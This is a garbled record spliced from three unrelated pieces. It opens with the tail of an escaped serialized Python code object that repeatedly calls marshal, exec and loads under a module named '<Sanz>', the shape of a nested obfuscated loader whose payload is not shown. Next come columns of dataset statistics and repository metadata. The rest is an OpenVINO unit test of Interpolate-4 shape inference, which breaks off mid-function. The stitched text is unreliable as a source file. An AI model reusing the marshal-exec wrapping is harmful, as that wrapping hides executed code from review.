5loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x06<Sanz>\xda\x08<module>\x04\x00\x00\x00s\x02\x00\x00\x00\x08\x01'))
| 37,149.4
| 185,645
| 0.762941
| 41,481
| 185,747
| 3.415901
| 0.021745
| 0.520075
| 0.522933
| 0.518466
| 0.947479
| 0.94124
| 0.935326
| 0.929468
| 0.925573
| 0.921712
| 0
| 0.390036
| 0.000705
| 185,747
| 5
| 185,645
| 37,149.4
| 0.373341
| 0.000431
| 0
| 0
| 0
| 4.5
| 0.921013
| 0.900578
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0.5
| 0
| 0.5
| 0.5
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
|
0
| 21
|
e89761d00c3880fb29027e6065152c87d2140a0d
| 17,234
|
py
|
Python
|
model-optimizer/unit_tests/extensions/ops/interpolate_test.py
|
monroid/openvino
|
8272b3857ef5be0aaa8abbf7bd0d5d5615dc40b6
|
[
"Apache-2.0"
] | 2,406
|
2020-04-22T15:47:54.000Z
|
2022-03-31T10:27:37.000Z
|
model-optimizer/unit_tests/extensions/ops/interpolate_test.py
|
thomas-yanxin/openvino
|
031e998a15ec738c64cc2379d7f30fb73087c272
|
[
"Apache-2.0"
] | 4,948
|
2020-04-22T15:12:39.000Z
|
2022-03-31T18:45:42.000Z
|
model-optimizer/unit_tests/extensions/ops/interpolate_test.py
|
thomas-yanxin/openvino
|
031e998a15ec738c64cc2379d7f30fb73087c272
|
[
"Apache-2.0"
] | 991
|
2020-04-23T18:21:09.000Z
|
2022-03-31T18:40:57.000Z
|
# Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import unittest
import numpy as np
from generator import generator, generate
from extensions.ops.interpolate import Interpolate
from mo.front.common.partial_infer.utils import int64_array
from mo.graph.graph import Node
from unit_tests.utils.graph import build_graph
graph_node_attrs_without_axes = {
'input': {'type': 'Parameter', 'kind': 'op'},
'input_data': {'kind': 'data', 'shape': None, 'value': None},
'sizes': {'type': 'Const', 'kind': 'op', 'shape': None, 'value': None},
'sizes_data': {'kind': 'data', 'shape': None, 'value': None},
'scales': {'type': 'Const', 'kind': 'op', 'shape': None, 'value': None},
'scales_data': {'kind': 'data', 'shape': None, 'value': None},
'interpolate': {
'type': 'Interpolate', 'kind': 'op', 'mode': 'nearest', 'shape_calculation_mode': 'sizes',
'coordinate_transformation_mode': 'half_pixel', 'version': 'opset4',
'nearest_mode': 'round_prefer_floor', 'antialias': 0,
},
'interpolate_data': {'kind': 'data', 'value': None, 'shape': None},
'op_output': {'kind': 'op', 'op': 'Result'},
}
graph_edges_without_axes = [
('input', 'input_data'),
('sizes', 'sizes_data'),
('scales', 'scales_data'),
('input_data', 'interpolate', {'in': 0}),
('sizes_data', 'interpolate', {'in': 1}),
('scales_data', 'interpolate', {'in': 2}),
('interpolate', 'interpolate_data'),
('interpolate_data', 'op_output'),
]
graph_nodes_attrs = {
'input': {'type': 'Parameter', 'kind': 'op'},
'input_data': {'kind': 'data', 'shape': None, 'value': None},
'sizes': {'type': 'Const', 'kind': 'op', 'shape': None, 'value': None},
'sizes_data': {'kind': 'data', 'shape': None, 'value': None},
'scales': {'type': 'Const', 'kind': 'op', 'shape': None, 'value': None},
'scales_data': {'kind': 'data', 'shape': None, 'value': None},
'axes': {'type': 'Const', 'kind': 'op', 'shape': None, 'value': None},
'axes_data': {'kind': 'data', 'shape': None, 'value': None},
'interpolate': {
'type': 'Interpolate', 'kind': 'op', 'mode': 'nearest', 'shape_calculation_mode': 'sizes',
'coordinate_transformation_mode': 'half_pixel', 'version': 'opset4',
'nearest_mode': 'round_prefer_floor', 'antialias': 0,
},
'interpolate_data': {'kind': 'data', 'value': None, 'shape': None},
'op_output': {'kind': 'op', 'op': 'Result'},
}
graph_edges = [
('input', 'input_data'),
('sizes', 'sizes_data'),
('scales', 'scales_data'),
('axes', 'axes_data'),
('input_data', 'interpolate', {'in': 0}),
('sizes_data', 'interpolate', {'in': 1}),
('scales_data', 'interpolate', {'in': 2}),
('axes_data', 'interpolate', {'in': 3}),
('interpolate', 'interpolate_data'),
('interpolate_data', 'op_output'),
]
@generator
class TestInterpolateOp(unittest.TestCase):
@generate(*[([0], [0], [1, 3, 100, 200], [1, 3, 350, 150], [350, 150], [3.5, 150 / 200], [2, 3]),
([0, 3, 10, 10], [0], [16, 7, 190, 400], [8, 10, 390, 600],
[8, 390, 600], [0.5, 390 / 200, 600 / 410], [0, 2, 3]),
([10, 5, 0, 10], [0, 4, 16, 18], [4, 33, 1024, 8000], [56, 42, 520, 8028],
[56, 520], [4.0, 0.5], [0, 2]),
([0], [0], [1, 16, 85, 470, 690], [20, 16, 40, 470, 1380],
[20, 40, 1380], [20.0, 40.0 / 85.0, 1380.0 / 690.0], [0, 2, 4]),
([4, 3, 11, 22, 5], [1, 3, 4, 8, 5], [1, 16, 85, 470, 690], [60, 22, 430, 500, 345],
[60, 430, 345], [10.0, 4.3, 345.0 / 700.0], [0, 2, 4]),
([0], [0], [5, 77, 444, 88, 6050], [100, 308, 4440, 44, 6050],
[100, 308, 4440, 44], [20.0, 4.0, 10.0, 0.5], [0, 1, 2, 3]),
([0], [0], [1, 100, 200], [1, 350, 150], [350, 150], [3.5, 150 / 200], [1, 2]),
([0, 3, 10], [0], [16, 7, 190], [8, 10, 390], [8, 390], [0.5, 390 / 200], [0, 2]),
([10, 0, 10], [0, 16, 18], [4, 1024, 8000], [56, 520, 8028], [56, 520], [4.0, 0.5], [0, 1]),
([0], [0], [1, 690], [20, 1380], [20, 1380], [20.0, 1380.0 / 690.0], [0, 1]),
([4, 3, 11, 22, 5, 0], [1, 3, 4, 8, 5, 0], [1, 16, 85, 470, 690, 349], [60, 22, 430, 500, 345, 349],
[60, 430, 345], [10.0, 4.3, 345.0 / 700.0], [0, 2, 4])
])
def test_interpolate4_using_sizes(self, pads_begin, pads_end, input_shape, output_shape, sizes, scales, axes):
graph = build_graph(nodes_attrs=graph_nodes_attrs,
edges=graph_edges,
update_attributes={
'input_data': {'shape': input_shape},
'sizes': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)},
'sizes_data': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)},
'scales': {'shape': np.array(scales).shape, 'value': np.array(scales)},
'scales_data': {'shape': np.array(scales).shape, 'value': np.array(scales)},
'axes': {'shape': int64_array(axes).shape, 'value': int64_array(axes)},
'axes_data': {'shape': int64_array(axes).shape, 'value': int64_array(axes)},
'interpolate': {'pads_begin': int64_array(pads_begin),
'pads_end': int64_array(pads_end)}
})
node = Node(graph, 'interpolate')
tested_class = Interpolate(graph=graph, attrs=node.attrs())
tested_class.infer(node)
msg = "Interpolate-4 infer failed for case: sizes={}, scales={}, pads_begin={}, pads_end={}, axes={}," \
" expected_shape={}, actual_shape={}"
self.assertTrue(np.array_equal(graph.node['interpolate_data']['shape'], int64_array(output_shape)),
msg.format(sizes, scales, pads_begin, pads_end, axes, output_shape,
graph.node['interpolate_data']['shape']))
@generate(*[([0], [0], [1, 3, 100, 200], [1, 3, 350, 150], [350, 150], [3.5, 150 / 200], [2, 3]),
([0, 3, 10, 10], [0], [16, 7, 190, 400], [8, 10, 390, 600],
[8, 390, 600], [0.5, 390 / 200, 600 / 410], [0, 2, 3]),
([10, 5, 0, 10], [0, 4, 16, 18], [4, 33, 1024, 8000], [56, 42, 520, 8028],
[56, 520], [4.0, 0.5], [0, 2]),
([0], [0], [1, 16, 85, 470, 690], [20, 16, 40, 470, 1380],
[20, 40, 1380], [20.0, 40.0 / 85.0, 1380.0 / 690.0], [0, 2, 4]),
([4, 3, 11, 22, 5], [1, 3, 4, 8, 5], [1, 16, 85, 470, 690], [60, 22, 430, 500, 345],
[60, 430, 345], [10.0, 4.3, 345.0 / 700.0], [0, 2, 4]),
([0], [0], [5, 77, 444, 88, 6050], [100, 308, 4440, 44, 6050],
[100, 308, 4440, 44], [20.0, 4.0, 10.0, 0.5], [0, 1, 2, 3]),
([0], [0], [1, 100, 200], [1, 350, 150], [350, 150], [3.5, 150 / 200], [1, 2]),
([0, 3, 10], [0], [16, 7, 190], [8, 10, 390], [8, 390], [0.5, 390 / 200], [0, 2]),
([10, 0, 10], [0, 16, 18], [4, 1024, 8000], [56, 520, 8028], [56, 520], [4.0, 0.5], [0, 1]),
([0], [0], [1, 690], [20, 1380], [20, 1380], [20.0, 1380.0 / 690.0], [0, 1]),
([4, 3, 11, 22, 5, 0], [1, 3, 4, 8, 5, 0], [1, 16, 85, 470, 690, 349], [60, 22, 430, 500, 345, 349],
[60, 430, 345], [10.0, 4.3, 345.0 / 700.0], [0, 2, 4]),
([4, 3, 11, 22, 5, 0, 0], [1, 3, 4, 8, 5, 0, 0], [1, 16, 85, 470, 690, 349, 3],
[60, 22, 430, 500, 345, 349, 1],
[60, 430, 345, 1], [10.0, 4.3, 345.0 / 700.0, 1 / 3], [0, 2, 4, 6]),
([4, 3, 11, 22, 5, 0, 0], [1, 3, 4, 8, 5, 0, 0], [1, 16, 85, 470, 690, 349, 3],
[60, 22, 430, 500, 345, 349, 1],
[60, 430, 345, 1], [10.0, 4.3, 345.0 / 700.0, 0.3333333], [0, 2, 4, 6]),
])
def test_interpolate4_using_scales(self, pads_begin, pads_end, input_shape, output_shape, sizes, scales, axes):
graph = build_graph(nodes_attrs=graph_nodes_attrs,
edges=graph_edges,
update_attributes={
'input_data': {'shape': input_shape},
'sizes': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)},
'sizes_data': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)},
'scales': {'shape': np.array(scales).shape, 'value': np.array(scales)},
'scales_data': {'shape': np.array(scales).shape, 'value': np.array(scales)},
'axes': {'shape': int64_array(axes).shape, 'value': int64_array(axes)},
'axes_data': {'shape': int64_array(axes).shape, 'value': int64_array(axes)},
'interpolate': {'pads_begin': int64_array(pads_begin),
'pads_end': int64_array(pads_end),
'shape_calculation_mode': 'scales'}
})
node = Node(graph, 'interpolate')
tested_class = Interpolate(graph=graph, attrs=node.attrs())
tested_class.infer(node)
msg = "Interpolate-4 infer failed for case: sizes={}, scales={}, pads_begin={}, pads_end={}, axes={}," \
" expected_shape={}, actual_shape={}"
self.assertTrue(np.array_equal(graph.node['interpolate_data']['shape'], int64_array(output_shape)),
msg.format(sizes, scales, pads_begin, pads_end, axes, output_shape,
graph.node['interpolate_data']['shape']))
@generate(*[([0], [0], [1, 3, 100, 200], [1, 3, 350, 150], [1, 3, 350, 150], [1.0, 1.0, 3.5, 150 / 200]),
([0, 3, 10, 10], [0], [16, 7, 190, 400], [8, 10, 390, 600],
[8, 10, 390, 600], [0.5, 1.0, 390 / 200, 600 / 410]),
([10, 5, 0, 10], [0, 4, 16, 18], [4, 33, 1024, 8000], [56, 42, 520, 8028],
[56, 42, 520, 8028], [4.0, 1.0, 0.5, 1.0]),
([0], [0], [1, 16, 85, 470, 690], [20, 16, 40, 470, 1380],
[20, 16, 40, 470, 1380], [20.0, 1.0, 40.0 / 85.0, 1.0, 1380.0 / 690.0]),
([4, 3, 11, 22, 5], [1, 3, 4, 8, 5], [1, 16, 85, 470, 690], [60, 22, 430, 500, 345],
[60, 22, 430, 500, 345], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0]),
([0], [0], [5, 77, 444, 88, 6050], [100, 308, 4440, 44, 6050],
[100, 308, 4440, 44, 6050], [20.0, 4.0, 10.0, 0.5, 1.0]),
([0], [0], [1, 100, 200], [1, 350, 150], [1, 350, 150], [1.0, 3.5, 150 / 200]),
([0, 3, 10], [0], [16, 7, 190], [8, 10, 390], [8, 10, 390], [0.5, 1.0, 390 / 200]),
([10, 0, 10], [0, 16, 18], [4, 1024, 8000], [56, 520, 8028], [56, 520, 8028], [4.0, 0.5, 1.0]),
([0], [0], [1, 690], [20, 1380], [20, 1380], [20.0, 1380.0 / 690.0]),
([4, 3, 11, 22, 5, 0], [1, 3, 4, 8, 5, 0], [1, 16, 85, 470, 690, 349], [60, 22, 430, 500, 345, 349],
[60, 22, 430, 500, 345, 349], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0, 1.0]),
([4, 3, 11, 22, 5, 0, 0], [1, 3, 4, 8, 5, 0, 0], [1, 16, 85, 470, 690, 349, 3],
[60, 22, 430, 500, 345, 349, 1],
[60, 22, 430, 500, 345, 349, 1], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0, 1.0, 1 / 3]),
])
def test_interpolate4_using_sizes_without_axes(self, pads_begin, pads_end, input_shape, output_shape, sizes,
scales):
graph = build_graph(nodes_attrs=graph_node_attrs_without_axes,
edges=graph_edges_without_axes,
update_attributes={
'input_data': {'shape': input_shape},
'sizes': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)},
'sizes_data': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)},
'scales': {'shape': np.array(scales).shape, 'value': np.array(scales)},
'scales_data': {'shape': np.array(scales).shape, 'value': np.array(scales)},
'interpolate': {'pads_begin': int64_array(pads_begin),
'pads_end': int64_array(pads_end),
'shape_calculation_mode': 'sizes'}
})
node = Node(graph, 'interpolate')
tested_class = Interpolate(graph=graph, attrs=node.attrs())
tested_class.infer(node)
msg = "Interpolate-4 infer failed for case: sizes={}, scales={}, pads_begin={}, pads_end={}," \
" expected_shape={}, actual_shape={}"
self.assertTrue(np.array_equal(graph.node['interpolate_data']['shape'], int64_array(output_shape)),
msg.format(sizes, scales, pads_begin, pads_end, output_shape,
graph.node['interpolate_data']['shape']))
@generate(*[([0], [0], [1, 3, 100, 200], [1, 3, 350, 150], [1, 3, 350, 150], [1.0, 1.0, 3.5, 150 / 200]),
([0, 3, 10, 10], [0], [16, 7, 190, 400], [8, 10, 390, 600],
[8, 10, 390, 600], [0.5, 1.0, 390 / 200, 600 / 410]),
([10, 5, 0, 10], [0, 4, 16, 18], [4, 33, 1024, 8000], [56, 42, 520, 8028],
[56, 42, 520, 8028], [4.0, 1.0, 0.5, 1.0]),
([0], [0], [1, 16, 85, 470, 690], [20, 16, 40, 470, 1380],
[20, 16, 40, 470, 1380], [20.0, 1.0, 40.0 / 85.0, 1.0, 1380.0 / 690.0]),
([4, 3, 11, 22, 5], [1, 3, 4, 8, 5], [1, 16, 85, 470, 690], [60, 22, 430, 500, 345],
[60, 22, 430, 500, 345], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0]),
([0], [0], [5, 77, 444, 88, 6050], [100, 308, 4440, 44, 6050],
[100, 308, 4440, 44, 6050], [20.0, 4.0, 10.0, 0.5, 1.0]),
([0], [0], [1, 100, 200], [1, 350, 150], [1, 350, 150], [1.0, 3.5, 150 / 200]),
([0, 3, 10], [0], [16, 7, 190], [8, 10, 390], [8, 10, 390], [0.5, 1.0, 390 / 200]),
([10, 0, 10], [0, 16, 18], [4, 1024, 8000], [56, 520, 8028], [56, 520, 8028], [4.0, 0.5, 1.0]),
([0], [0], [1, 690], [20, 1380], [20, 1380], [20.0, 1380.0 / 690.0]),
([4, 3, 11, 22, 5, 0], [1, 3, 4, 8, 5, 0], [1, 16, 85, 470, 690, 349], [60, 22, 430, 500, 345, 349],
[60, 22, 430, 500, 345, 349], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0, 1.0]),
([4, 3, 11, 22, 5, 0, 0], [1, 3, 4, 8, 5, 0, 0], [1, 16, 85, 470, 690, 349, 3],
[60, 22, 430, 500, 345, 349, 1],
[60, 22, 430, 500, 345, 349, 1], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0, 1.0, 1 / 3]),
([4, 3, 11, 22, 5, 0, 0], [1, 3, 4, 8, 5, 0, 0], [1, 16, 85, 470, 690, 349, 3],
[60, 22, 430, 500, 345, 349, 1],
[60, 22, 430, 500, 345, 349, 1], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0, 1.0, 0.3333333]),
])
def test_interpolate4_using_scales_without_axes(self, pads_begin, pads_end, input_shape, output_shape, sizes,
scales):
